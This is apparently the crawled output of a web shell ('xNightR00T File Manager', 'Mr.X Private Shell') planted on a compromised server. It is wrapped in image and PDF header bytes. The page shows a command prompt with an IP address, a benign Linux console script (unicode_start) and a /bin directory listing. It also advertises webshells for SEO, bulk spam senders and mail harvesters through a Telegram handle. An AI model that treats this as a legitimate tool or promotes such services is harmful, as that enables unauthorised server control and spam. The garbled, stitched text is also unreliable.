xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
#!/bin/sh

# 0. Check whether we're on a console
TTY="`/usr/bin/tty`"
case "$TTY" in
	/dev/console|/dev/vc*|/dev/tty[0-9]*)
		;;
	*)
		echo "unicode_start skipped on $TTY" >&2
		exit 0
		;;
esac

# Enables Unicode processing in the current console.
#
# 1. The input side: the keyboard driver.

# Set the keyboard driver in Unicode mode. (Default is ASCII mode.)
# This really does nothing with the way normal keys are handled in
# the kernel. All it does is:
# - It is necessary for `dumpkeys' in order to not drop U+XXXX
#   entries from the keymaps.
# - It is necessary for `loadkeys' in order to avoid warnings.
# - Unicode characters typed as Alt-x1 ... Alt-xn (where x1,...,xn
#   are digits on the numeric keypad) will be emitted in UTF-8.

kbd_mode -u

# Change the keyboard mapping in such a way that the non-ASCII keys
# produce UTF-8 encoded multibyte sequences, instead of single bytes
# >= 0x80 in a legacy 8-bit encoding.

# Non-root users are allowed to change the unicode mode of their console, but
# not the global keymap. root will have to load the keymap in unicode mode
# explicitly.

uid="`id -u 2>/dev/null`" ||:
if [ "$uid" = '0' ]; then
	# There is no way of reverting the effect of "dumpkeys | loadkeys --unicode",
	# the memory of the earlier keymap is lost. Therefore, try
	# to save a copy of the original keymap to be able to reload it in unicode_stop.
	# (see also http://mail.nl.linux.org/linux-utf8/2003-08/msg00053.html):

	[ -n "$HOME" -a "$HOME" != '/' ] ||
		HOME='/root'

	if [ -d "$HOME" -a -w "$HOME" ]; then
		[ -d "$HOME/.kbd" ] ||
			mkdir -- "$HOME/.kbd"

		[ ! -w "$HOME/.kbd" ] ||
			dumpkeys > "$HOME/.kbd/.keymap_sv"
	fi

	# redirect stderr and stdout of loadkeys to /dev/null to avoid the confusing
	# "plus before udiaeresis ignored" warnings.

	dumpkeys | loadkeys --unicode > /dev/null 2>&1
fi

# 2. The output side: the console screen.

# Tell the console output driver that the bytes arriving are UTF-8
# encoded multibyte sequences.
if [ -t 1 -a -t 2 ]; then
	printf '\033%%G'
fi
stty iutf8

# Tell the graphics card how to display Unicode characters not
# contained in the IBM 437 character set (on PCs). The font should
# have a Unicode map attached, or explicitly specified, e.g.,
# by giving `def.uni' as a second argument.

DEFAULT_UNICODE_FONT='LatArCyrHeb-16'
# Also drdos8x16 is a good candidate.

# Fonts with 512 glyphs like LatArCyrHeb-16 make it impossible to use bold
# on the console, which makes YaST2 unusable. To be able to use bold,
# only fonts with 256 glyphs can be used. Therefore we prefer
# the font specified in /etc/sysconfig/console. This should be OK because
# the default font written to /etc/sysconfig/console by YaST2
# is currently always a font with 256 glyphs and a Unicode map
# which is suitable for the language used during the installation.

case "$#" in
	2)
		setfont "$1" -u "$2"
		;;
	1)
		setfont "$1"
		;;
	0)
		if [ -f /etc/sysconfig/console ] ; then
		    . /etc/sysconfig/console
		fi
		if [ -n "$CONSOLE_FONT" ] ; then
			SETFONT_ARGS="$CONSOLE_FONT"
		    if [ -n "$CONSOLE_UNICODEMAP" ] ; then
			SETFONT_ARGS="$SETFONT_ARGS -u $CONSOLE_UNICODEMAP"
		    fi
		    if [ -n "$CONSOLE_SCREENMAP" ] ; then
			SETFONT_ARGS="$SETFONT_ARGS -m $CONSOLE_SCREENMAP"
		    fi
		    setfont $SETFONT_ARGS
		    if [ -n "$CONSOLE_MAGIC" -a "$CONSOLE_MAGIC" != "none" ] ; then
			printf "\033$CONSOLE_MAGIC"
		    fi
		else
		    setfont $DEFAULT_UNICODE_FONT
		fi
		;;
	*)
		echo "usage: unicode_start [font [unicode map]]"
		;;
esac

Filemanager

Name Type Size Permission Actions
arch File 30.84 KB 0755
awk File 500 KB 0755
basename File 30.79 KB 0755
bash File 681.46 KB 0755
blkparse File 45 KB 0755
blktrace File 36.98 KB 0755
btrace File 891 B 0755
cat File 51 KB 0755
chgrp File 58.94 KB 0755
chmod File 54.91 KB 0755
chown File 62.97 KB 0755
chvt File 10.32 KB 0755
clrunimap File 10.31 KB 0755
cp File 147.59 KB 0755
cpio File 138.31 KB 0755
csh File 378.18 KB 0755
date File 66.97 KB 0755
dbus-cleanup-sockets File 10.39 KB 0755
dbus-daemon File 412.62 KB 0755
dbus-monitor File 18.5 KB 0755
dbus-send File 22.63 KB 0755
dbus-uuidgen File 10.31 KB 0755
dd File 71.04 KB 0755
deallocvt File 10.33 KB 0755
df File 95.77 KB 0755
dmesg File 70.41 KB 0755
dnsdomainname File 14.48 KB 0755
domainname File 14.48 KB 0755
dumpkeys File 98.55 KB 0755
echo File 30.75 KB 0755
ed File 46.7 KB 0755
egrep File 143.38 KB 0755
ex File 2.25 MB 0755
false File 26.75 KB 0755
fgconsole File 10.33 KB 0755
fgrep File 143.38 KB 0755
fillup File 38.47 KB 0755
find File 188.7 KB 0755
findmnt File 63.29 KB 0755
fsync File 6.29 KB 0755
fuser File 39.48 KB 0755
gawk File 500 KB 0755
getkeycodes File 10.33 KB 0755
getunimap File 14.38 KB 0755
grep File 147.41 KB 0755
guess_encoding File 7.92 KB 0755
gunzip File 2.29 KB 0755
gzip File 79.92 KB 0755
hostname File 14.48 KB 0755
initviocons File 19.55 KB 0755
ip File 498 KB 0755
ipg File 571 B 0755
kbd_mode File 10.32 KB 0755
kbdinfo File 10.34 KB 0755
kbdrate File 10.39 KB 0755
keyctl File 26.59 KB 0755
kill File 30.17 KB 0755
ksh File 227.55 KB 0755
lksh File 227.55 KB 0755
ln File 54.98 KB 0755
loadkeys File 135.05 KB 0755
loadunimap File 26.64 KB 0755
logger File 42.7 KB 0755
login File 38.09 KB 0755
ls File 119.73 KB 0755
lsblk File 96.22 KB 0755
lsmod File 236.71 KB 0755
mail File 352.48 KB 0755
mapscrn File 18.6 KB 0755
md5sum File 42.88 KB 0755
mkdir File 75.16 KB 0755
mknod File 63.09 KB 0755
mksh File 287.62 KB 0755
mktemp File 38.91 KB 0755
more File 38.09 KB 0755
mount File 46.17 KB 4755
mv File 123.54 KB 0755
netstat File 118.7 KB 0755
nisdomainname File 10.43 KB 0755
openvt File 18.55 KB 0755
outpsfheader File 6.23 KB 0755
pdksh File 227.55 KB 0755
pgrep File 22.64 KB 0755
pidof File 22.66 KB 0755
ping File 42.46 KB 0755
ping6 File 42.81 KB 0755
pkill File 22.64 KB 0755
plymouth File 34.7 KB 0755
ps File 91.27 KB 0755
psfaddtable File 18.41 KB 0755
psfgettable File 18.41 KB 0755
psfstriptable File 18.41 KB 0755
psfxtable File 18.41 KB 0755
pwd File 30.84 KB 0755
readlink File 38.82 KB 0755
resizecons File 18.61 KB 0755
rm File 58.97 KB 0755
rmdir File 38.81 KB 0755
rpm File 14.88 KB 0755
screendump File 10.39 KB 0755
sed File 75.84 KB 0755
setfont File 38.7 KB 0755
setkeycodes File 10.33 KB 0755
setleds File 10.38 KB 0755
setlogcons File 10.33 KB 0755
setmetamode File 10.44 KB 0755
setpalette File 10.31 KB 0755
setvesablank File 10.32 KB 0755
setvtrgb File 10.41 KB 0755
sh File 681.46 KB 0755
showconsolefont File 14.41 KB 0755
showkey File 14.38 KB 0755
sleep File 30.78 KB 0755
sort File 111.63 KB 0755
spawn_console File 10.29 KB 0755
spawn_login File 10.29 KB 0755
stat File 75.16 KB 0755
stty File 66.91 KB 0755
su File 58.17 KB 4755
sync File 30.81 KB 0755
systemctl File 692.05 KB 0755
systemd File 1.54 MB 0755
systemd-ask-password File 66.3 KB 0755
tar File 341.68 KB 0755
tcsh File 378.18 KB 0755
touch File 59.03 KB 0755
true File 26.75 KB 0755
umount File 30.17 KB 4755
uname File 30.84 KB 0755
unicode_start File 3.44 KB 0755
unicode_stop File 363 B 0755
usleep File 6.3 KB 0755
vi File 2.25 MB 0755
vim File 2.25 MB 0755
ypdomainname File 10.43 KB 0755
zcat File 1.94 KB 0755
zsh File 693.03 KB 0755
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1